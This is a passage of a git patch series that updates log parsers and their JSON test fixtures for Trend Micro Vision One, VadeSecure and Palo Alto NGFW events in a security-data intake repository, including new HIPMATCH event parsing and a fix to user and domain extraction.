\"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "john\\doe", + "name": "john\\doe" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "name": "doe" + } + } +} \ No newline at end of file From f2de94f0d1331ad57d49d1dcd514a59ee4fce317 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Wed, 20 Nov 2024 16:13:59 +0100 Subject: [PATCH 46/84] Update VadeSecure/vade_secure_m365/_meta/fields.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- VadeSecure/vade_secure_m365/_meta/fields.yml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index a3f60b15c..3dae6aab9 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,10 +58,20 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details: - description: Details of security protocols, mostly SPF, DKIM and DMARC. - name: vadesecure.auth_results_details - type: object +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + +vadesecure.auth_results_details.dkim: + description: The result of the DomainKeys Identified Mail (DKIM) + name: vadesecure.auth_results_details.dkim + type: keyword + +vadesecure.auth_results_details.dmarc: + description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + name: vadesecure.auth_results_details.dmarc + type: keyword vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. From 89031da02131389356f2da10693a5c1a31cbdac1 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 20 Nov 2024 16:17:44 +0100 Subject: [PATCH 47/84] fix on linting --- VadeSecure/vade_secure_m365/_meta/fields.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 3dae6aab9..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,21 +58,22 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details.spf: - description: The result of the Sender Policy Framework (SPF) - name: vadesecure.auth_results_details.spf - type: keyword - vadesecure.auth_results_details.dkim: description: The result of the DomainKeys Identified Mail (DKIM) name: vadesecure.auth_results_details.dkim type: keyword vadesecure.auth_results_details.dmarc: - description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + description: Result of the Domand-based Message Authentication Reporting and Conformance + (DMARC) name: vadesecure.auth_results_details.dmarc type: keyword +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions From ddb81e469ab08e04985947091be03113e7236a49 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:00 +0100 Subject: [PATCH 48/84] chore(PaloAlto): name some columns --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..c81ad890e 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID From 03c2c78afb7a413856adddbbe760f167de860cd8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:44 +0100 Subject: [PATCH 49/84] fix(PaloAlto): fix the definition of the user properties --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/network_threat_alert_2.json | 6 +++--- .../paloalto-ngfw/tests/test_file_alert_json.json | 6 +++--- Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json | 6 +++--- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c81ad890e..b7ec21cac 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -810,8 +810,8 @@ stages: user.name: '{{final.user.name.split("\\") | last}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: - user.domain: '{{final.user.email.split("@") | first}}' - user.name: '{{final.user.email.split("@") | last}}' + user.domain: '{{final.user.email.split("@") | last}}' + user.name: '{{final.user.email.split("@") | first}}' filter: '{{final.user.email != null and "@" in final.user.email}}' - set: source.user.domain: '{{final.source.user.name.split("\\") | first}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index e8c257c69..f1e6cf2ad 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file From 5763f40af5d8945417a9c7383753d6b97a2ab79a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:09:32 +0100 Subject: [PATCH 50/84] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..952e819e2 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} From 3aa5e742b94a0c9afa7f7572496254a95354dffd Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:23:49 +0100 Subject: [PATCH 51/84] fix(PaloAlto): extract host id and rule name for HIPMatch --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/globalprotect_csv.json | 1 + .../paloalto-ngfw/tests/globalprotect_csv_2.json | 1 + .../paloalto-ngfw/tests/test_globalprotect.json | 1 + .../paloalto-ngfw/tests/test_hipmatch_json.json | 6 +++++- .../paloalto-ngfw/tests/test_new_globalprotect.json | 1 + 6 files changed, 11 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index b7ec21cac..ba7fd4535 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -592,7 +592,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -617,7 +617,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index e4b1d5fab..1d68c400c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json index 952e819e2..b0b294778 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", @@ -69,4 +73,4 @@ "name": "jdoe" } } -} +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From 45faefddb4854625e6a8c01fda4a52418f4a62f1 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:27:19 +0100 Subject: [PATCH 52/84] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-ngfw/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ba7fd4535..ea07e1d10 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -382,6 +382,49 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From caa9e0ca8bb19e04ea9ebec30f3419cf3190ce53 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:02:45 +0100 Subject: [PATCH 53/84] fix(PaloAlto): improve support for decryption events --- .../paloalto-ngfw/_meta/fields.yml | 17 ++- .../paloalto-ngfw/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 118 ++++++++++++++++++ 3 files changed, 144 insertions(+), 1 deletion(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto 